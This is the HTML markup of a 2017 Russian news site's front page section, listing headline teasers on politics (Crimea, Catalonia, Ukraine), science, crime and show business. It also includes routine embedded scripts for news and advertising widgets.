		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/ce7f4996e988f851f0cf3da611221720.jpg" alt="В Госдуме прокомментировали предложение президента Чехии по Крыму" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551948">В Госдуме прокомментировали предложение президента Чехии по Крыму</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551948">Глава комитета Госдумы по международным делам Леонид Слуцкий прокомментировал предложение президента Чехии Милоша Земана о компенсации России Украине за Крым: "Крым - это не предмет торга или сделки".</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/science">Наука</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/69484942bf0f1f8d019dcedb66192df2.jpg" alt="Ученые выяснили, почему мужчины эгоистичнее женщин" />
	

<p class="minititle"><a href="http://argumenti.ru/science/2017/10/551947">Ученые выяснили, почему мужчины эгоистичнее женщин</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/science/2017/10/551947">Ученые выяснили, почему мужчины эгоистичнее женщин, а слабый пол добрее сильного. Оказалось, что все зависит от уровня дофаминов, или "гормонов вознаграждения", которые поступают в мозг после совершенных поступков.
</a></div>		</div>
	</div>	



<div class="mainrub">
		<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>
	



	<img src="http://argumenti.ru/images/preview/arhnews/104802d108bedaf76f41f8f986132def.jpg" alt="Украина готовит против России крупный иск по Донбассу" />
	
<p class="maxititle"><a href="http://argumenti.ru/politics/2017/09/550313">Украина готовит против России крупный иск по Донбассу</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/09/550313">Украина завершает подготовку большого иска, который будет подан в Международный суд в ООН против России из-за ситуации в Донбассе, заявил министр юстиции Украины Павел Петренко.
</a></div>	</div>
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/economics">Экономика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/c71f77736de643b61d75487bc8f67dab.jpg" alt="Путин: регулирование криптовалют должно защитить граждан и бизнес" />
	

<p class="minititle"><a href="http://argumenti.ru/economics/2017/10/551931">Путин: регулирование криптовалют должно защитить граждан и бизнес</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/economics/2017/10/551931">Владимир Путин провел совещание по криптовалютам, на котором отметил, что криптовалюты набирают популярность в мире, становясь полноценным платежным средством. Необходимо выстроить их регулирование.
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/129300f11ce4ec17ba391c95bc2542b1.jpg" alt="Венгрия потребует пересмотреть соглашение об ассоциации Украины с Евросоюзом" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551857">Венгрия потребует пересмотреть соглашение об ассоциации Украины с Евросоюзом</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551857">Необходимость внесения правок в документ глава МИД Венгрии объяснил принятием украинскими властями нового закона об образовании. В Будапеште считают, что данный правовой акт ущемляет права венгров. </a></div>		</div>
	</div>
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/92cb1ec7d3600c9e6631f18bea96510c.jpg" alt="Власти Испании отказались признать независимость Каталонии" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551960">Власти Испании отказались признать независимость Каталонии</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551960">Данное заявление стало ответом испанского правительства на подписание в Каталонии декларации о независимости, за которую высказались участники плебисцита, состоявшегося в автономии 1 октября. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/685c8276e8d713a5085abedd9d665ae0.jpg" alt="Штаб АТО объяснил задержание украинского военнослужащего на границе с Россией" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551962">Штаб АТО объяснил задержание украинского военнослужащего на границе с Россией</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551962">Об этом происшествии «Аргументы недели» писали накануне. Российские пограничники задержали военнослужащего Вооруженных сил Украины, который пытался незаконно пересечь границу РФ на Луганском направлении.</a></div>		</div>
	</div>
<!-- заввершающая линия -->
	<div class="publ_line">
		<div class="publ_line_lend">
		</div>
		<div class="publ_line_rend">
		</div>
	</div>
	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/6c7965e4cf59f3d6d2bcdc375b4b0a8c.jpeg" alt="Готовность Крымского моста оценивается в 40-45 процентов" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/10/551967">Готовность Крымского моста оценивается в 40-45 процентов</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/10/551967">Строительство Крымского моста в настоящий момент завершено на 40-45 процентов. Данную информацию в среду, 11 октября, предоставил заместитель начальника заказчика проекта ФКУ Упрдор "Тамань".</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/rassledovanie">Расследования</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/e863829b36ab8e42f1e20c8928c65da3.jpg" alt="Семья &quot;пьяного мальчика&quot; заявила иск к обвиняемой на 10 млн руб" />
	

<p class="minititle"><a href="http://argumenti.ru/rassledovanie/2017/10/551939">Семья &quot;пьяного мальчика&quot; заявила иск к обвиняемой на 10 млн руб</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/rassledovanie/2017/10/551939">Семья шестилетнего мальчика из подмосковной Балашихи, которого насмерть сбила автоледи, заявила иск к обвиняемой Ольге Алисовой на общую сумму более 10 миллионов рублей.</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/science">Наука</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/bd0a331a3497258fa782a36b43328009.jpg" alt="Найдена невидимая половина вселенной" />
	

<p class="minititle"><a href="http://argumenti.ru/science/2017/10/551969">Найдена невидимая половина вселенной</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/science/2017/10/551969">Международная группа ученых нашла 50% видимого вещества во Вселенной, которое считалось пропавшим. Материя оказалась плотно упакована между галактиками и галактическими скоплениями (кластерами). </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/b5ae02cb18a79daa1118297da1276523.jpeg" alt="В базу данных украинского сайта &quot;Миротворец&quot; попала артистка Надежда Бабкина" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551972">В базу данных украинского сайта &quot;Миротворец&quot; попала артистка Надежда Бабкина</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551972">Знаменитая российская певица Надежда Бабкина попала в базу данных украинского сайта "Миротворец". Согласно последней информации, в черном списке известная артистка оказалась из-за посещения Крыма.</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/de693838e8bef1102de6f03dcdac0e3f.jpeg" alt="Жириновский хочет помериться IQ с Трампом и Тиллерсоном" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/10/551978">Жириновский хочет помериться IQ с Трампом и Тиллерсоном</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/10/551978">Российский политик, лидер партии ЛДПР Владимир Жириновский готов помериться коэффициентом своего интеллекта с президентом США Дональдом Трампом и американским госсекретарем Рексом Тиллерсоном.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/4c824d5b3446a5e403e6628cdb5ea3f4.jpeg" alt="В МИД России высказались о возможности введения санкций в отношении Ирана" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/10/551976">В МИД России высказались о возможности введения санкций в отношении Ирана</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/10/551976">В МИД России прокомментировали последствия, которые может иметь возможный выход США из соглашения по ядерной программе Ирана. Данное действие может поставить под вопрос реализацию данного проекта.</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/c8ff7238eff6b4fa0bce04f23157f85e.jpg" alt="Недовольная украинским законом об образовании Венгрия пригрозила Киеву санкциями" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551974">Недовольная украинским законом об образовании Венгрия пригрозила Киеву санкциями</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551974">Закон «Об образовании», принятый недавно Киевом, предполагает ограничение обучения на языках национальных меньшинств. В Будапеште считают, что правовой акт нарушает права венгров, проживающих на Украине. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/incident">Происшествия</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/9ca2716ff5db8d8328b81f4833cd0a11.jpg" alt="Более миллиона долларов похитили из банковской ячейки в центре Москвы" />
	

<p class="minititle"><a href="http://argumenti.ru/incident/2017/10/551975">Более миллиона долларов похитили из банковской ячейки в центре Москвы</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/incident/2017/10/551975">Более миллиона долларов похитили накануне из банковской ячейки в центре Москвы. Согласно последней информации, к сотрудникам правоохранительных органов в минувший вторник обратился мужчина.</a></div>		</div>
	</div>



	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/250d424ff76ce16193329b1808d6a69d.jpg" alt="Норвежские народные дипломаты собрались убедить Запад признать российский Крым" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/10/551971">Норвежские народные дипломаты собрались убедить Запад признать российский Крым</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/10/551971">Полуостров вошел в состав РФ весной 2014 года. Ранее в среду «Аргументы недели» писали, что депутат Верховной Рады Надежда Савченко допустила силовой вариант возвращения Крыма под контроль Киева.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/026801f29a17ae9ba10cf37b29ca89ab.jpg" alt="Актер Михаил Ефремов отказался сниматься в Крыму" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/10/551973">Актер Михаил Ефремов отказался сниматься в Крыму</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/10/551973">Заявление актера и режиссера, заслуженного артиста РФ Михаила ЕФРЕМОВА о вероятном отказе от съемок в Крыму вызвало шквал обсуждений в интернете.</a></div>		</div>
	</div>




	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/eab71e0c78a3a52c39cb7cd1272aa972.jpeg" alt="Ольга Бузова оскорбила своих обидчиков" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2017/10/551970">Ольга Бузова оскорбила своих обидчиков</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2017/10/551970">Телеведущая и певица Ольга Бузова жестко высказалась в адрес своих обидчиков. По мнению знаменитости, в настоящий момент в шоу-бизнесе любой, кто хочет "засветиться", пытается нанести ей оскорбление.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/cd4c999d69fd3d1dff0621db7fff02ea.jpg" alt="СМИ узнали причину гибели Су-24 в Сирии" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551968">СМИ узнали причину гибели Су-24 в Сирии</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551968">В СМИ появилась информация о том, что послужило причиной аварии Су-24 в Сирии, закончившейся разрушением фронтового бомбардировщика и гибелью экипажа. Инцидент на авиабазе Хмеймим произошел в минувший вторник.</a></div>		</div>
	</div>

	<!-- заввершающая линия -->
	<div class="publ_line">
		<div class="publ_line_lend">
		</div>
		<div class="publ_line_rend">
		</div>
	</div>


	<h2 class="namerub"><span class="rem">//</span>Новости Гнездо.ру</h2>
<!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_14115">Загрузка...</div>
<script language='JavaScript'>
var s = document.createElement("script"),
f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
s.type = "text/javascript";
s.async = true;
s.src = '//news.2xclick.ru/show/14115/block_a.js';
if (window.opera == "[object Opera]") {
document.addEventListener("DOMContentLoaded", f);
} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/ac52fd28f8cf40f6f4200a80ae77afd1.jpeg" alt="Подозреваемая в убийстве брата Ким Чен Ына &quot;тренировалась&quot; на другом мужчине" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551966">Подозреваемая в убийстве брата Ким Чен Ына &quot;тренировалась&quot; на другом мужчине</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551966">Подозреваемая в убийстве брата лидера КНДР Ким Чен Ына "отрабатывала" нападение на другом человеке. Согласно последней информации, "тренировка" прошла за два дня до трагической смерти Ким Чен Нама.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/crime">Криминал</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/652aa3a17b1b63e008dcceec8e764992.jpg" alt="ФСБ задержала в Крыму участников запрещенной в РФ террористической группировки" />
	

<p class="minititle"><a href="http://argumenti.ru/crime/2017/10/551965">ФСБ задержала в Крыму участников запрещенной в РФ террористической группировки</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/crime/2017/10/551965">В информации, распространенной ведомством, говорится о том, что экстремисты действовали на территории Бахчисарайского района Республики Крым. В отношении шести задержанных были возбуждены уголовные дела.</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/e6632f155da756f16cb4649b2900549b.jpg" alt="Савченко допустила силовой вариант возвращения Крыма под контроль Украины" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551964">Савченко допустила силовой вариант возвращения Крыма под контроль Украины</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551964">Кроме того, депутат отметила, что нужно заставить мировое сообщество относиться к Крыму так же, как и к Донбассу. Для этого, по мнению Надежды Савченко, необходимо лишить Крым статуса автономной республики.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/d008f0b48244f3cf2de3130f894e3307.jpg" alt="Премьер-министр Чехии раскритиковал заявление Земана о Крыме" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551959">Премьер-министр Чехии раскритиковал заявление Земана о Крыме</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551959">Ранее чешский президент Милош Земан, выступая в ПАСЕ, назвал потерю Крыма Украиной завершенным делом. Земан предложил Москве выплатить Киеву компенсацию за вошедший в состав России полуостров. </a></div>		</div>
	</div>




	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/culture">Культура</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/43375be7ccd05040336f515eb421d3d0.jpg" alt="Сообщение о смерти Хворостовского опровергли в окружении певца" />
	

<p class="minititle"><a href="http://argumenti.ru/culture/2017/10/551958">Сообщение о смерти Хворостовского опровергли в окружении певца</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/culture/2017/10/551958">Ранее о кончине певца Дмитрия Хворостовского в социальных сетях сообщила Елена Мизулина. Через некоторое время член Совета Федерации удалила данную информацию, пояснив, что ее ввели в заблуждение СМИ.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/ce1f531ecc130de3f13b5b2fc9f4aea1.jpg" alt="ЕСПЧ обязал РФ выплатить 285 тысяч евро родственникам погибших в 2000 г. в Чечне" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/10/551957">ЕСПЧ обязал РФ выплатить 285 тысяч евро родственникам погибших в 2000 г. в Чечне</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/10/551957">Европейский суд по правам человека (ЕСПЧ) обязал Россию выплатить 285 тысяч евро родственникам погибших в 2000 году в Чечне. Истцами выступили 20 человек, большинство из которых живут в Чечне. </a></div>		</div>
	</div>



	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/crime">Криминал</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/c0be52ae3c4d9df38cffe45f98d7fd9b.png" alt="Суд продлил арест сыну актера &quot;Интерны&quot;, избившему блогера в Парке Горького" />
	

<p class="minititle"><a href="http://argumenti.ru/crime/2017/10/551955">Суд продлил арест сыну актера &quot;Интерны&quot;, избившему блогера в Парке Горького</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/crime/2017/10/551955">Хамовнический суд Москвы продлил срок ареста обвиняемому в умышленном причинении вреда здоровью, повлекшему смерть петербургского блогера Станислава Думкина, Корнею Макарову до 13 ноября.
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/cae267f89b2e6df85f4752b2df6ad85f.jpg" alt="Поклонская обратилась в Генпрокуратуру с двумя просьбами" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/10/551956">Поклонская обратилась в Генпрокуратуру с двумя просьбами</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/10/551956">Наталья Поклонская обратилась в Генпрокуратуру с двумя просьбами: принять меры для запрета деятельности организации "Христианское государство" и отозвать прокатное удостоверение на фильм "Матильда".</a></div>		</div>
	</div>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/sport">Спорт</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/a712ad8639ffb93ecf63b9426cfad69b.png" alt="Порошенко высказался о поражении Украины и невыходе на ЧМ-2018 в России" />
	

<p class="minititle"><a href="http://argumenti.ru/sport/2017/10/551954">Порошенко высказался о поражении Украины и невыходе на ЧМ-2018 в России</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/sport/2017/10/551954">Сборная Украины по футболу пропустит чемпионат мира, который в 2018 году пройдет в России. Команда Андрея Шевченко в заключительном матче отборочного турнира к ЧМ-2018 проиграла сборной Хорватии. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/science">Наука</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/ecc914e87a1a509df74c50ce3ce30271.jpg" alt="Назван лучший способ распознавать эмоции собеседника" />
	

<p class="minititle"><a href="http://argumenti.ru/science/2017/10/551953">Назван лучший способ распознавать эмоции собеседника</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/science/2017/10/551953">Ученые в Йельском университете (США) пришли к выводу, что человек лучше распознает эмоции на слух. Оказывается, одновременно воспринимать окрас голоса человека и его мимику мы не можем. 
</a></div>		</div>
	</div>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/aab141a63f8a3323aae6a0667645f80c.jpg" alt="Две звезды Голливуда рассказали о домогательствах продюсера Вайнштейна" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2017/10/551952">Две звезды Голливуда рассказали о домогательствах продюсера Вайнштейна</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2017/10/551952">Две известные голливудстве актрисы Анджелина Джоли и Гвинет Пэлтроу рассказали о домогательствах  кинопродюсера Харви Вайнштейн. Признания звезд Голливуда  опубликовала  The New York Times. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/c649d9fa868a6e08bde0d88b7262d616.jpg" alt="Полиция использовала слезоточивый газ на демонстрации профсоюзов в Париже" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551951">Полиция использовала слезоточивый газ на демонстрации профсоюзов в Париже</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551951">Около 400 тыс. человек приняли участие во вторник в акциях протеста против реформы трудового кодекса во Франции. Об этом заявили во Всеобщей конфедерации труда (ВКТ). Не работают школы и детские сады, бастуют врачи.





</a></div>		</div>
	</div>	
		<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/science">Наука</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/6c80fc0f1169de3e9f4f05357684c79c.jpg" alt="Российские биотехнологи   разработали  вакциону против гриппа" />
	

<p class="minititle"><a href="http://argumenti.ru/science/2017/10/551950">Российские биотехнологи   разработали  вакциону против гриппа</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/science/2017/10/551950">Российские биотехнологи разработали новую вакцину против гриппа. Медики предполагают, что в этом году активны будут четыре штамма гриппа: два типа А и  два — типа Б. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/a1bad6a1b3fa499c116da851b1cb0e17.jpg" alt="Глава Каталонии призвал приостановить провозглашение независимости" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/10/551949">Глава Каталонии призвал приостановить провозглашение независимости</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/10/551949">На выступлении в региональном парламенте глава правительства Каталонии Карлес Пучдемон призвал отложить провозглашение независимости от Испании. По его словам, Барселоне и Мадриду требуется «много недель диалога».

</a></div>		</div>
	</div>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/ce7f4996e988f851f0cf3da611221720.jpg" alt="В Госдуме прокомментировали предложение президента Чехии по Крыму" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/10/551948">В Госдуме прокомментировали предложение президента Чехии по Крыму</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/10/551948">Глава комитета Госдумы по международным делам Леонид Слуцкий прокомментировал предложение президента Чехии Милоша Земана о компенсации России Украине за Крым: "Крым - это не предмет торга или сделки".</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/science">Наука</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/69484942bf0f1f8d019dcedb66192df2.jpg" alt="Ученые выяснили, почему мужчины эгоистичнее женщин" />
	

<p class="minititle"><a href="http://argumenti.ru/science/2017/10/551947">Ученые выяснили, почему мужчины эгоистичнее женщин</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/science/2017/10/551947">Ученые выяснили, почему мужчины эгоистичнее женщин, а слабый пол добрее сильного. Оказалось, что все зависит от уровня дофаминов, или "гормонов вознаграждения", которые поступают в мозг после совершенных поступков.
</a></div>		</div>
	</div>		</section>
	</div>

			<div style="margin-top: 8px;" class="right">

<div class="adv_corp">
		<div id="smi2adblock_45368"><a href="http://smi2.ru/" rel="nofollow">Новости СМИ2</a></div>
<script async type="text/javascript" charset="windows-1251">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.smi2.ru/data/js/45368.js'; sc.charset = 'windows-1251';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>

</div>
		<script>
	$(document).ready(function(){
		$(".auth_but").click(function(){
		$(".a").toggle();
		$(".auth_but").toggle();
	});
});
</script>

	<h2 class="newsrub"><span class="rem">//</span>Авторы АН</h2>
	<div id="authors">
					<div class="author">
												<a href="http://argumenti.ru/authors/uglanov"><img src="http://argumenti.ru/images/authors/8b6587f95c1dbfff2622fec567aa1205.jpg" alt="" /></a>
				<p class="auth_title"><a href="http://argumenti.ru/authors/uglanov">Андрей Угланов</a></p>
				<p class="auth_anons"><a href="http://argumenti.ru/society/2017/10/551333">Великое послушание Большого театра</a></p>
			</div>
					<div class="author">
												<a href="http://argumenti.ru/authors/moskvina"><img src="http://argumenti.ru/images/authors/3ad6921c5f9362675ebf472feaa631df.jpg" alt="" /></a>
				<p class="auth_title"><a href="http://argumenti.ru/authors/moskvina">Татьяна Москвина</a></p>
				<p class="auth_anons"><a href="http://argumenti.ru/culture/2017/10/551356">В &laquo;Крыму&raquo; Крыма-то и нет</a></p>
			</div>
					<div class="author">
												<a href="http://argumenti.ru/authors/Krestiyaninov"><img src="http://argumenti.ru/images/authors/f17f7ddbb0976eda39fc309eb7281b75.jpg" alt="" /></a>
				<p class="auth_title"><a href="http://argumenti.ru/authors/Krestiyaninov">Виктор Крестьянинов</a></p>
				<p class="auth_anons"><a href="http://argumenti.ru/politics/2017/10/551334">Вслед за призраком Сталина в Европу пожаловал призрак Франко</a></p>
			</div>
					<div class="author">
												<a href="http://argumenti.ru/authors/gurdin"><img src="http://argumenti.ru/images/authors/1856e4f56858caadd420a6d23471045b.jpg" alt="" /></a>
				<p class="auth_title"><a href="http://argumenti.ru/authors/gurdin">Константин Гурдин</a></p>
				<p class="auth_anons"><a href="http://argumenti.ru/economics/2017/09/550590">Ядерные столпы</a></p>
			</div>
						
	</div>	



	<div id="authors">

													<div class="a author">
																		<a href="http://argumenti.ru/authors/leonov"><img src="http://argumenti.ru/images/authors/713b23e010290cbe2897d9d2287532ac.jpg" alt="Владимир Леонов" /></a>
						<p class="auth_title"><a href="http://argumenti.ru/authors/leonov">Владимир Леонов</a></p>
						<p class="auth_anons"><a href="http://argumenti.ru/society/2017/10/551343">Золотая звезда</a></p>
					</div>
																		<div class="a author">
																		<a href="http://argumenti.ru/authors/tchuykov"><img src="http://argumenti.ru/images/authors/53a57ea5a54087725200bc171897e697.jpg" alt="Александр Чуйков" /></a>
						<p class="auth_title"><a href="http://argumenti.ru/authors/tchuykov">Александр Чуйков</a></p>
						<p class="auth_anons"><a href="http://argumenti.ru/society/2017/09/550587">Учёные и &laquo;АН&raquo; победили &laquo;дракона&raquo; Фурсенко</a></p>
					</div>
																		<div class="a author">
																		<a href="http://argumenti.ru/authors/ryazanov"><img src="http://argumenti.ru/images/authors/8941e3fe0828997c7877c9b05db1b2d2.jpg" alt="Сергей Рязанов" /></a>
						<p class="auth_title"><a href="http://argumenti.ru/authors/ryazanov">Сергей Рязанов</a></p>
						<p class="auth_anons"><a href="http://argumenti.ru/society/2017/10/551336">Начало - в России</a></p>
					</div>
						
</div>
<p class="auth_but">Все авторы >></p>
<p class="auth_but" style="display:none;"><< Скрыть всех авторов</p>
		


				<noindex>
		<h2 class="namerub"><span class="rem">//</span>Новости Гнездо.ру</h2>
<!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_14114">Загрузка...</div>
<script language='JavaScript'>
var s = document.createElement("script"),
f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
s.type = "text/javascript";
s.async = true;
s.src = '//news.2xclick.ru/show/14114/block_a.js';
if (window.opera == "[object Opera]") {
document.addEventListener("DOMContentLoaded", f);
} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->




		</noindex>
						
		
		<div id="lx_561097"></div>
